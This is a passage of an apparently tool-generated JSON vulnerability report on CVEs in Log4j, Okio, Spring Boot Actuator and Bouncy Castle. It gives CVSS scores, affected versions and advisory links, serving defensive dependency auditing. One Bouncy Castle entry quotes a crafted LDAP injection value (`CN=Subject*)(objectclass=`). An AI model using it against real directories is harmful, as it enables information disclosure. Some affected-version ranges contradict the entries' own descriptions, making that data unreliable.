changes-report","url":"https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0"},{"summary":"Apache Advisory lookups","url":"https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup"},{"summary":"Apache Advisory migration","url":"https://logging.apache.org/log4j/2.x/manual/migration.html"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Microsoft Advisory microsofts-response-to-cve-2021-44228-apache-log4j2","url":"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44228"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44228"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"NetApp Advisory ntap-20211210-0007","url":"https://security.netapp.com/advisory/ntap-20211210-0007"},{"summary":"Apple Advisory HT213189","url":"https://support.apple.com/kb/HT213189"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Twitter Advisory 1469345530182455296","url":"https://twitter.com/kurtseifried/status/1469345530182455296"},{"summary":"Bentley Advisory be-2022-0001","url":"https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"},{"summary":"Debian Advisory dsa-5020","url":"https://www.debian.org/security/2021/dsa-5020"},{"summary":"Intel Advisory intel-sa-00646","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Nu11secur1ty Exploit","url":"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"},{"summary":"Oracle Advisory alert-cve-2021-44228","url":"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":10.0,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":10.0,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":10.0,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.2"]}],"title":"CVE-2021-44228/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-45105"]}],"cve":"CVE-2021-45105","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-12-18T18:00:07","ids":[{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-45105"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5024"},{"system_name":"NetApp Advisory","text":"ntap-20211218-0001"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-501673"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Recursion","title":"Additional CWE: 674"},{"category":"description","details":"Vulnerability Description","text":"Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion"},{"category":"details","details":"Vulnerability Details","text":"# Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3.   # Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.3"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/19/1"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-501673","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45105"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45105"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"NetApp Advisory ntap-20211218-0001","url":"https://security.netapp.com/advisory/ntap-20211218-0001"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Debian Advisory dsa-5024","url":"https://www.debian.org/security/2021/dsa-5024"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Zero Day Initiative Exploit","url":"https://www.zerodayinitiative.com/advisories/ZDI-21-1541"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.6,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":8.6,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":8.6,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"]}],"title":"CVE-2021-45105/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9488"]}],"cve":"CVE-2020-9488","cwe":{"id":"295","name":"Improper Certificate Validation"},"discovery_date":"2020-06-05T14:15:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-9488"},{"system_name":"Apache Advisory","text":"LOG4J2-2819"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-5020"},{"system_name":"NetApp Advisory","text":"ntap-20200504-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper validation of certificate with host mismatch in Apache Log4j SMTP appender"},{"category":"details","details":"Vulnerability Details","text":"# Improper validation of certificate with host mismatch in Apache Log4j SMTP appender Improper validation of certificate with host mismatch in Apache Log4j SMTP appender prior to version 2.13.2. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.3"]},"references":[{"summary":"Apache Advisory LOG4J2-2819","url":"https://issues.apache.org/jira/browse/LOG4J2-2819"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0a2699f724156a558afd1abb6c044fb9132caa66dce861b82699722a@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0df3d7a5acb98c57e64ab9266aa21eeee1d9b399addb96f9cf1cbe05@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1fc73f0e16ec2fa249d3ad39a5194afb9cc5afb4c023dc0bab5a5881@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r22a56beb76dd8cf18e24fda9072f1e05990f49d6439662d3782a392f@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2f209d271349bafd91537a558a279c08ebcff8fa3e547357d58833e6@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r33864a0fc171c1c4bf680645ebb6d4f8057899ab294a43e1e4fe9d04@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r393943de452406f0f6f4b3def9f8d3c071f96323c1f6ed1a098f7fe4@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d1d00441c55144a4013adda74b051ae7864128ebcfb6ee9721a2eb3@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4285398e5585a0456d3d9db021a4fce6e6fcf3ec027dfa13a450ec98@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r45916179811a32cbaa500f972de9098e6ee80ee81c7f134fce83e03a@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r48bcd06049c1779ef709564544c3d8a32ae6ee5c3b7281a606ac4463@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r48efc7cb5aeb4e1f67aaa06fb4b5479a5635d12f07d0b93fc2d08809@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4d5dc9f3520071338d9ebc26f9f158a43ae28a91923d176b550a807b@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4db540cafc5d7232c62e076051ef661d37d345015b2e59b3f81a932f@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4ed1f49616a8603832d378cb9d13e7a8b9b27972bb46d946ccd8491f@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5a68258e5ab12532dc179edae3d6e87037fa3b50ab9d63a90c432507@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r65578f3761a89bc164e8964acd5d913b9f8fd997967b195a89a97ca3@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7641ee788e1eb1be4bb206a7d15f8a64ec6ef23e5ec6132d5a567695@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e739f2961753af95e2a3a637828fb88bfca68e5d6b0221d483a9ee5@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8c001b9a95c0bbec06f4457721edd94935a55932e64b82cc5582b846@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9776e71e3c67c5d13a91c1eba0dc025b48b802eb7561cc6956d6961c@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9a79175c393d14d760a0ae3731b4a873230a16ef321aa9ca48a810cd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra051e07a0eea4943fa104247e69596f094951f51512d42c924e86c75@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra632b329b2ae2324fabbad5da204c4ec2e171ff60348ec4ba698fd40@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc45eb0f53fd6242af3e666c2189464f848a851d408289840cecc6e3@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc6b81c013618d1de1b5d6b8c1088aaf87b4bacc10c2371f15a566701@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd55f65c6822ff235eda435d31488cfbb9aa7055cdf47481ebee777cc@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd8e87c4d69df335d0ba7d815b63be8bd8a6352f429765c52eb07ddac@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re024d86dffa72ad800f2848d0c77ed93f0b78ee808350b477a6ed987@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rec34b1cccf907898e7cb36051ffac3ccf1ea89d0b261a2a3b3fb267f@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1c2a81a08034c688b8f15cf58a4cfab322d00002ca46d20133bee20@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9488"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9488"},{"summary":"NetApp Advisory ntap-20200504-0003","url":"https://security.netapp.com/advisory/ntap-20200504-0003"},{"summary":"Debian Advisory dsa-5020","url":"https://www.debian.org/security/2021/dsa-5020"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":3.7,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.7,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":3.7,"temporalSeverity":"LOW","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"]}],"title":"CVE-2020-9488/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-3635"]}],"cve":"CVE-2023-3635","cwe":{"id":"195","name":"Signed to Unsigned Conversion Error"},"discovery_date":"2023-07-12T21:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2023-3635"},{"system_name":"JFrog Advisory","text":"okio-gzip-source-unhandled-exception-dos-xray-523195"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Conversion between Numeric Types","title":"Additional CWE: 681"},{"category":"description","details":"Vulnerability Description","text":"Okio Signed to Unsigned Conversion Error vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Okio Signed to Unsigned Conversion Error vulnerability GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class."}],"product_status":{"known_affected":["com.squareup.okio/okio@vers:maven/>=0.5.0|<=1.17.5"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-3635"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-3635"},{"summary":"JFrog Advisory okio-gzip-source-unhandled-exception-dos-xray-523195","url":"https://research.jfrog.com/vulnerabilities/okio-gzip-source-unhandled-exception-dos-xray-523195"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.squareup.okio/okio@vers:maven/>=0.5.0|<=1.17.5"]}],"title":"CVE-2023-3635/pkg:maven/com.squareup.okio/okio@1.6.0?type=jar"},{"cve":"CVE-2023-34055","discovery_date":"2023-11-28T09:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2023-34055"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862"},{"system_name":"NetApp Advisory","text":"ntap-20231221-0010"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Boot Actuator denial of service vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Spring Boot Actuator denial of service vulnerability In Spring Boot versions 2.7.0 - 2.7.17, 3.0.0-3.0.12 and 3.1.0-3.1.5, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.  Specifically, an application is vulnerable when all of the following are true:   * the application uses Spring MVC or Spring WebFlux  * `org.springframework.boot:spring-boot-actuator` is on the classpath"}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-actuator@vers:maven/>=1.0.0.RELEASE|<=2.7.9"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34055"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34055"},{"summary":"NetApp Advisory ntap-20231221-0010","url":"https://security.netapp.com/advisory/ntap-20231221-0010"},{"summary":"Snyk Advisory SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862","url":"https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-34055"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["org.springframework.boot/spring-boot-actuator@vers:maven/>=1.0.0.RELEASE|<=2.7.9"]}],"title":"CVE-2023-34055/pkg:maven/org.springframework.boot/spring-boot-actuator@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-15522"]}],"cve":"CVE-2020-15522","cwe":{"id":"203","name":"Observable Discrepancy"},"discovery_date":"2021-08-13T15:22:31","ids":[{"system_name":"CVE Record","text":"CVE-2020-15522"},{"system_name":"NetApp Advisory","text":"ntap-20210622-0007"}],"notes":[{"audience":"developers","category":"other","text":"Concurrent Execution using Shared Resource with Improper Synchronization","title":"Additional CWE: 362"},{"category":"description","details":"Vulnerability Description","text":"Timing based private key exposure in Bouncy Castle"},{"category":"details","details":"Vulnerability Details","text":"# Timing based private key exposure in Bouncy Castle Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.2.1, BC before 1.66, BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.65.01"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.66"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15522"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15522"},{"summary":"NetApp Advisory ntap-20210622-0007","url":"https://security.netapp.com/advisory/ntap-20210622-0007"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.1,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.1,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.1,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.65.01"]}],"title":"CVE-2020-15522/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-26939"]}],"cve":"CVE-2020-26939","cwe":{"id":"203","name":"Observable Discrepancy"},"discovery_date":"2021-04-22T16:16:49","ids":[{"system_name":"CVE Record","text":"CVE-2020-26939"},{"system_name":"NetApp Advisory","text":"ntap-20201202-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Observable Differences in Behavior to Error Inputs in Bouncy Castle"},{"category":"details","details":"Vulnerability Details","text":"# Observable Differences in Behavior to Error Inputs in Bouncy Castle In Legion of the Bouncy Castle BC before 1.55 and BC-FJA before 1.0.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.60"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.55"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/11/msg00007.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26939"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26939"},{"summary":"NetApp Advisory ntap-20201202-0005","url":"https://security.netapp.com/advisory/ntap-20201202-0005"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.60"]}],"title":"CVE-2020-26939/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-33201"]}],"cve":"CVE-2023-33201","cwe":{"id":"295","name":"Improper Certificate Validation"},"discovery_date":"2023-07-05T03:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-33201"},{"system_name":"NetApp Advisory","text":"ntap-20230824-0008"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bouncy Castle For Java LDAP injection vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Bouncy Castle For Java LDAP injection vulnerability Bouncy Castle provides the `X509LDAPCertStoreSpi.java` class which can be used in conjunction with the CertPath API for validating certificate paths. Pre-1.73 the implementation did not check the X.500 name of any certificate, subject, or issuer being passed in for LDAP wild cards, meaning the presence of a wild car may lead to Information Disclosure.  A potential attack would be to generate a self-signed certificate with a subject name that contains special characters, e.g: `CN=Subject*)(objectclass=`. This will be included into the filter and provides the attacker ability to specify additional attributes in the search query. This can be exploited as a blind LDAP injection: an attacker can enumerate valid attribute values using the boolean blind injection technique. The exploitation depends on the structure of the target LDAP directory, as well as what kind of errors are exposed to the user.  Changes to the `X509LDAPCertStoreSpi.java` class add the additional checking of any X.500 name used to correctly escape 